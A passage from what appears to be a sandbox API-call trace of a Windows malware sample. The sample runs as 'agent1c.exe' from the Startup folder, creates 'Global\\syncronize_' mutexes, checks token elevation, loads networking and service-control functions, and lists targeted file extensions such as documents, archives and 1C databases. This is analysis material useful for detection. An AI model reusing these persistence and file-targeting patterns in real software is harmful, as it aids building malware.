(lpLibFileName="advapi32.dll") returned 0x76cd0000 [0256.842] GetProcAddress (hModule=0x76cd0000, lpProcName="RegOpenKeyExW") returned 0x76ce468d [0256.842] GetProcAddress (hModule=0x76cd0000, lpProcName="RegQueryValueExW") returned 0x76ce46ad [0256.843] GetProcAddress (hModule=0x76cd0000, lpProcName="RegSetValueExW") returned 0x76ce14d6 [0256.843] GetProcAddress (hModule=0x76cd0000, lpProcName="RegCloseKey") returned 0x76ce469d [0256.843] GetProcAddress (hModule=0x76cd0000, lpProcName="OpenProcessToken") returned 0x76ce4304 [0256.843] GetProcAddress (hModule=0x76cd0000, lpProcName="GetTokenInformation") returned 0x76ce431c [0256.843] GetProcAddress (hModule=0x76cd0000, lpProcName="OpenSCManagerW") returned 0x76cdca64 [0256.843] GetProcAddress (hModule=0x76cd0000, lpProcName="OpenServiceW") returned 0x76cdca4c [0256.843] GetProcAddress (hModule=0x76cd0000, lpProcName="CloseServiceHandle") returned 0x76ce369c [0256.843] GetProcAddress (hModule=0x76cd0000, lpProcName="ControlService") returned 0x76cf7144 [0256.843] GetProcAddress (hModule=0x76cd0000, lpProcName="QueryServiceStatus") returned 0x76ce2a86 [0256.843] GetProcAddress (hModule=0x76cd0000, lpProcName="EnumDependentServicesW") returned 0x76cd1e3a [0256.843] GetProcAddress (hModule=0x76cd0000, lpProcName="EnumServicesStatusExW") returned 0x76cdb466 [0256.843] LoadLibraryA (lpLibFileName="user32.dll") returned 0x75890000 [0256.856] GetProcAddress (hModule=0x75890000, lpProcName="SystemParametersInfoW") returned 0x758a90d3 [0256.856] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x75c20000 [0256.860] GetProcAddress (hModule=0x75c20000, lpProcName="ShellExecuteExW") returned 0x75c41e46 [0256.860] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x771e0000 [0256.860] GetProcAddress (hModule=0x771e0000, lpProcName="NtQuerySystemInformation") returned 0x771ffda0 [0256.860] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x72da0000 [0260.440] GetProcAddress (hModule=0x72da0000, lpProcName="WNetCloseEnum") returned 0x72da2dd6 [0260.440] GetProcAddress (hModule=0x72da0000, lpProcName="WNetOpenEnumW") returned 0x72da2f06 [0260.440] GetProcAddress (hModule=0x72da0000, lpProcName="WNetEnumResourceW") returned 0x72da3058 [0260.440] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x75560000 [0260.441] GetProcAddress (hModule=0x75560000, lpProcName="WSAStartup") returned 0x75563ab2 [0260.441] GetProcAddress (hModule=0x75560000, lpProcName="socket") returned 0x75563eb8 [0260.441] GetProcAddress (hModule=0x75560000, lpProcName="send") returned 0x75566f01 [0260.441] GetProcAddress (hModule=0x75560000, lpProcName="recv") returned 0x75566b0e [0260.441] GetProcAddress (hModule=0x75560000, lpProcName="connect") returned 0x75566bdd [0260.441] GetProcAddress (hModule=0x75560000, lpProcName="closesocket") returned 0x75563918 [0260.441] GetProcAddress (hModule=0x75560000, lpProcName="gethostbyname") returned 0x75577673 [0260.441] GetProcAddress (hModule=0x75560000, lpProcName="inet_addr") returned 0x7556311b [0260.441] GetProcAddress (hModule=0x75560000, lpProcName="ntohl") returned 0x75562d57 [0260.442] GetProcAddress (hModule=0x75560000, lpProcName="htonl") returned 0x75562d57 [0260.442] GetProcAddress (hModule=0x75560000, lpProcName="htons") returned 0x75562d8b [0260.442] GetProcessHeap () returned 0x5c0000 [0260.442] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5d4218 [0260.442] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdb8 | out: lpPerformanceCount=0x18fdb8*=7194224003) returned 1 [0260.442] GetTickCount () returned 0x7000 [0260.442] GetCurrentProcessId () returned 0x4e8 [0260.442] GetTickCount () returned 0x7000 [0260.442] GetTickCount () returned 0x7000 [0260.442] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5d4240 [0260.442] GetVersion () returned 0x1db10106 [0260.442] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x7) returned 0x5c3828 [0260.442] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x10) returned 0x5d0d48 [0260.442] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5d0d48, Size=0x20) returned 0x5d4290 [0260.442] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5d4290, Size=0x40) returned 0x5d4828 [0260.442] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0xfffe) returned 0x5d4aa0 [0260.443] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_WRZB2LA") returned 0x84 [0260.443] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5c3828 | out: hHeap=0x5c0000) returned 1 [0260.443] lstrlenW (lpString="Global\\syncronize_") returned 18 [0260.443] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5d4828 | out: hHeap=0x5c0000) returned 1 [0260.443] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x7) returned 0x5c3828 [0260.443] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x10) returned 0x5d0d48 [0260.443] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5d0d48, Size=0x20) returned 0x5d4290 [0260.443] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5d4290, Size=0x40) returned 0x5d4828 [0260.443] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0xfffe) returned 0x5e4aa8 [0260.443] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_WRZB2LU") returned 0x88 [0260.443] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5c3828 | out: hHeap=0x5c0000) returned 1 [0260.443] lstrlenW (lpString="Global\\syncronize_") returned 18 [0260.443] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5d4828 | out: hHeap=0x5c0000) returned 1 [0260.443] GetVersion () returned 0x1db10106 [0260.443] GetCurrentProcess () returned 0xffffffff [0260.443] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fda4 | out: TokenHandle=0x18fda4*=0x8c) returned 1 [0260.443] GetTokenInformation (in: TokenHandle=0x8c, TokenInformationClass=0x14, TokenInformation=0x18fda0, TokenInformationLength=0x4, ReturnLength=0x18fdac | out: TokenInformation=0x18fda0, ReturnLength=0x18fdac) returned 1 [0260.443] CloseHandle (hObject=0x8c) returned 1 [0260.443] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x102 [0260.443] ExitProcess (uExitCode=0x0) Process: id = "8" image_name = "agent1c.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\agent1c.exe" page_root = "0x765b5000" os_pid = "0x4f0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e105" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 46 os_tid = 0x4f4 [0260.178] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74da0000 [0260.179] GetProcAddress (hModule=0x74da0000, lpProcName="GetProcAddress") returned 0x74db1222 [0260.179] GetProcAddress (hModule=0x74da0000, lpProcName="GetModuleHandleW") returned 0x74db34b0 [0260.179] GetProcAddress (hModule=0x74da0000, lpProcName="FindNextFileW") returned 0x74db54ee [0260.179] GetProcAddress (hModule=0x74da0000, lpProcName="FindClose") returned 0x74db4442 [0260.179] GetProcAddress (hModule=0x74da0000, lpProcName="MoveFileW") returned 0x74dc9af0 [0260.179] GetProcAddress (hModule=0x74da0000, lpProcName="GetFileSizeEx") returned 0x74db59e2 [0260.179] GetProcAddress (hModule=0x74da0000, lpProcName="GetModuleFileNameW") returned 0x74db4950 [0260.179] GetProcAddress (hModule=0x74da0000, lpProcName="GetFileAttributesW") returned 0x74db1b18 [0260.179] GetProcAddress (hModule=0x74da0000, lpProcName="ExitProcess") returned 0x74db7a10 [0260.179] GetProcAddress (hModule=0x74da0000, lpProcName="GetCommandLineW") returned 0x74db5223 [0260.179] GetProcAddress (hModule=0x74da0000, lpProcName="GetComputerNameW") returned 0x74dbdd0e [0260.179] GetProcAddress (hModule=0x74da0000, lpProcName="GetComputerNameA") returned 0x74dcb6e0 [0260.179] GetProcAddress (hModule=0x74da0000, lpProcName="CreateMutexW") returned 0x74db424c [0260.179] GetProcAddress (hModule=0x74da0000, lpProcName="lstrlenW") returned 0x74db1700 [0260.179] GetProcAddress (hModule=0x74da0000, lpProcName="lstrlenA") returned 0x74db5a4b [0260.179] GetProcAddress (hModule=0x74da0000, lpProcName="GetCurrentProcess") returned 0x74db1809 [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="WaitForSingleObject") returned 0x74db1136 [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="GetLogicalDrives") returned 0x74db5371 [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="GetTickCount") returned 0x74db110c [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="DeleteFileW") returned 0x74db89b3 [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="WideCharToMultiByte") returned 0x74db170d [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x74db1916 [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="Sleep") returned 0x74db10ff [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="LeaveCriticalSection") returned 0x77202270 [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="ReadFile") returned 0x74db3ed3 [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="CreateFileW") returned 0x74db3f5c [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="OpenMutexW") returned 0x74db5151 [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="EnterCriticalSection") returned 0x772022b0 [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="WaitForMultipleObjects") returned 0x74db4220 [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="lstrcmpiW") returned 0x74dcd5cd [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="lstrcmpiA") returned 0x74db3e8e [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="DeleteCriticalSection") returned 0x772145f5 [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="ReleaseMutex") returned 0x74db111e [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="CloseHandle") returned 0x74db1410 [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="GetVersion") returned 0x74db4467 [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="CreateThread") returned 0x74db34d5 [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="ExpandEnvironmentStringsW") returned 0x74db4173 [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="QueryPerformanceCounter") returned 0x74db1725 [0260.180] GetProcAddress (hModule=0x74da0000, lpProcName="QueryPerformanceFrequency") returned 0x74db41f0 [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="GetCurrentProcessId") returned 0x74db11f8 [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="SetFileAttributesW") returned 0x74dcd4f7 [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="GetVolumeInformationW") returned 0x74dcc860 [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="WriteFile") returned 0x74db1282 [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="SetFilePointerEx") returned 0x74dcc807 [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="SetEndOfFile") returned 0x74dcce2e [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="FindFirstFileW") returned 0x74db4435 [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="GetProcessHeap") returned 0x74db14e9 [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="HeapReAlloc") returned 0x77221f6e [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="HeapAlloc") returned 0x7720e026 [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="HeapFree") returned 0x74db14c9 [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="CreatePipe") returned 0x74e3415b [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="SetHandleInformation") returned 0x74dc195c [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="CreateProcessW") returned 0x74db103d [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="CompareStringW") returned 0x74db3bca [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="CompareStringA") returned 0x74db3c5a [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="OpenProcess") returned 0x74db1986 [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="TerminateProcess") returned 0x74dcd802 [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="GetSystemTime") returned 0x74db5a96 [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="SystemTimeToFileTime") returned 0x74db5a7e [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="GetLastError") returned 0x74db11c0 [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="CreateToolhelp32Snapshot") returned 0x74dd735f [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="Process32NextW") returned 0x74dd896c [0260.181] GetProcAddress (hModule=0x74da0000, lpProcName="Process32FirstW") returned 0x74dd8baf [0260.182] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76cd0000 [0260.191] GetProcAddress (hModule=0x76cd0000, lpProcName="RegOpenKeyExW") returned 0x76ce468d [0260.191] GetProcAddress (hModule=0x76cd0000, lpProcName="RegQueryValueExW") returned 0x76ce46ad [0260.191] GetProcAddress (hModule=0x76cd0000, lpProcName="RegSetValueExW") returned 0x76ce14d6 [0260.191] GetProcAddress (hModule=0x76cd0000, lpProcName="RegCloseKey") returned 0x76ce469d [0260.191] GetProcAddress (hModule=0x76cd0000, lpProcName="OpenProcessToken") returned 0x76ce4304 [0260.191] GetProcAddress (hModule=0x76cd0000, lpProcName="GetTokenInformation") returned 0x76ce431c [0260.191] GetProcAddress (hModule=0x76cd0000, lpProcName="OpenSCManagerW") returned 0x76cdca64 [0260.191] GetProcAddress (hModule=0x76cd0000, lpProcName="OpenServiceW") returned 0x76cdca4c [0260.191] GetProcAddress (hModule=0x76cd0000, lpProcName="CloseServiceHandle") returned 0x76ce369c [0260.192] GetProcAddress (hModule=0x76cd0000, lpProcName="ControlService") returned 0x76cf7144 [0260.192] GetProcAddress (hModule=0x76cd0000, lpProcName="QueryServiceStatus") returned 0x76ce2a86 [0260.192] GetProcAddress (hModule=0x76cd0000, lpProcName="EnumDependentServicesW") returned 0x76cd1e3a [0260.192] GetProcAddress (hModule=0x76cd0000, lpProcName="EnumServicesStatusExW") returned 0x76cdb466 [0260.192] LoadLibraryA (lpLibFileName="user32.dll") returned 0x75890000 [0260.201] GetProcAddress (hModule=0x75890000, lpProcName="SystemParametersInfoW") returned 0x758a90d3 [0260.201] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x75c20000 [0260.204] GetProcAddress (hModule=0x75c20000, lpProcName="ShellExecuteExW") returned 0x75c41e46 [0260.205] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x771e0000 [0260.205] GetProcAddress (hModule=0x771e0000, lpProcName="NtQuerySystemInformation") returned 0x771ffda0 [0260.205] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x72da0000 [0260.391] GetProcAddress (hModule=0x72da0000, lpProcName="WNetCloseEnum") returned 0x72da2dd6 [0260.391] GetProcAddress (hModule=0x72da0000, lpProcName="WNetOpenEnumW") returned 0x72da2f06 [0260.391] GetProcAddress (hModule=0x72da0000, lpProcName="WNetEnumResourceW") returned 0x72da3058 [0260.391] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x75560000 [0260.426] GetProcAddress (hModule=0x75560000, lpProcName="WSAStartup") returned 0x75563ab2 [0260.426] GetProcAddress (hModule=0x75560000, lpProcName="socket") returned 0x75563eb8 [0260.427] GetProcAddress (hModule=0x75560000, lpProcName="send") returned 0x75566f01 [0260.427] GetProcAddress (hModule=0x75560000, lpProcName="recv") returned 0x75566b0e [0260.427] GetProcAddress (hModule=0x75560000, lpProcName="connect") returned 0x75566bdd [0260.427] GetProcAddress (hModule=0x75560000, lpProcName="closesocket") returned 0x75563918 [0260.427] GetProcAddress (hModule=0x75560000, lpProcName="gethostbyname") returned 0x75577673 [0260.427] GetProcAddress (hModule=0x75560000, lpProcName="inet_addr") returned 0x7556311b [0260.427] GetProcAddress (hModule=0x75560000, lpProcName="ntohl") returned 0x75562d57 [0260.427] GetProcAddress (hModule=0x75560000, lpProcName="htonl") returned 0x75562d57 [0260.427] GetProcAddress (hModule=0x75560000, lpProcName="htons") returned 0x75562d8b [0260.427] GetProcessHeap () returned 0x4a0000 [0260.427] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20) returned 0x4b4370 [0260.427] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdb8 | out: lpPerformanceCount=0x18fdb8*=7192806830) returned 1 [0260.430] GetTickCount () returned 0x6ff1 [0260.430] GetCurrentProcessId () returned 0x4f0 [0260.430] GetTickCount () returned 0x6ff1 [0260.430] GetTickCount () returned 0x6ff1 [0260.430] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20) returned 0x4b4398 [0260.430] GetVersion () returned 0x1db10106 [0260.430] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x7) returned 0x4a3980 [0260.430] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b0ea0 [0260.430] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b0ea0, Size=0x20) returned 0x4b43e8 [0260.431] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b43e8, Size=0x40) returned 0x4b4980 [0260.431] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x4b4c30 [0260.431] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_WRZB2LA") returned 0x0 [0260.431] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_WRZB2LA") returned 0x84 [0260.431] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a3980 | out: hHeap=0x4a0000) returned 1 [0260.431] lstrlenW (lpString="Global\\syncronize_") returned 18 [0260.431] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4980 | out: hHeap=0x4a0000) returned 1 [0260.431] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x7) returned 0x4a3980 [0260.431] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b0ea0 [0260.431] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b0ea0, Size=0x20) returned 0x4b43e8 [0260.431] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b43e8, Size=0x40) returned 0x4b4980 [0260.431] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x4c4c38 [0260.431] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_WRZB2LU") returned 0x0 [0260.432] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_WRZB2LU") returned 0x88 [0260.432] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a3980 | out: hHeap=0x4a0000) returned 1 [0260.432] lstrlenW (lpString="Global\\syncronize_") returned 18 [0260.432] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4980 | out: hHeap=0x4a0000) returned 1 [0260.432] GetVersion () returned 0x1db10106 [0260.432] GetCurrentProcess () returned 0xffffffff [0260.432] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fda4 | out: TokenHandle=0x18fda4*=0x8c) returned 1 [0260.432] GetTokenInformation (in: TokenHandle=0x8c, TokenInformationClass=0x14, TokenInformation=0x18fda0, TokenInformationLength=0x4, ReturnLength=0x18fdac | out: TokenInformation=0x18fda0, ReturnLength=0x18fdac) returned 1 [0260.432] CloseHandle (hObject=0x8c) returned 1 [0260.432] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x0 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4a3980 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b0ea0 [0260.432] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b0ea0, Size=0x20) returned 0x4b43e8 [0260.432] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b43e8, Size=0x40) returned 0x4b4980 [0260.432] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4980, Size=0x80) returned 0x4b4980 [0260.432] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4980, Size=0x100) returned 0x4b4980 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x34) returned 0x4b4a88 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x4b0a90 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x4b0aa0 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4b0ab0 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4b0ea0 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x4b4ac8 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4b0eb8 [0260.432] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4ac8, Size=0x8) returned 0x4b4ac8 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4b0ed0 [0260.432] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4ac8, Size=0x10) returned 0x4b4ac8 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4b0ee8 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4b0f00 [0260.432] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4ac8, Size=0x20) returned 0x4b4ac8 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4b0f18 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4b0f30 [0260.432] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b0a90, Size=0x8) returned 0x4b0a90 [0260.432] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b0aa0, Size=0x8) returned 0x4b0aa0 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4b4af0 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4b0f48 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x4b4b00 [0260.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4b0f60 [0260.433] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4b00, Size=0x8) returned 0x4b4b00 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4d4c58 [0260.433] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4b00, Size=0x10) returned 0x4b4b00 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4d4c70 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4b4b18 [0260.433] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4b00, Size=0x20) returned 0x4b4b28 [0260.433] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b0a90, Size=0x10) returned 0x4b4b00 [0260.433] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b0aa0, Size=0x10) returned 0x4b4b50 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4b0a90 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4d4c88 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x4b0aa0 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4d4ca0 [0260.433] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b0aa0, Size=0x8) returned 0x4b0aa0 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4b4b68 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4d4cb8 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x4b4b78 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4d4cd0 [0260.433] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4b78, Size=0x8) returned 0x4b4b78 [0260.433] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4b00, Size=0x20) returned 0x4b4b88 [0260.433] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4b50, Size=0x20) returned 0x4b4bb0 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4b4b50 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4d4ce8 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x4b4bd8 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4d4d00 [0260.433] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4bd8, Size=0x8) returned 0x4b4bd8 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4d5040 [0260.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4d5060 [0260.433] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0260.433] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4980 | out: hHeap=0x4a0000) returned 1 [0260.433] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18fdf0 | out: lpWSAData=0x18fdf0) returned 0 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d30 [0260.437] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d30, Size=0x20) returned 0x4b45f0 [0260.437] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b45f0, Size=0x40) returned 0x4d9260 [0260.437] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9260, Size=0x80) returned 0x4d9260 [0260.437] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9260, Size=0x100) returned 0x4d9260 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d30 [0260.437] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d30, Size=0x20) returned 0x4b45f0 [0260.437] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b45f0, Size=0x40) returned 0x4d9368 [0260.437] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9368, Size=0x80) returned 0x4d9368 [0260.437] RtlReAllocateHeap 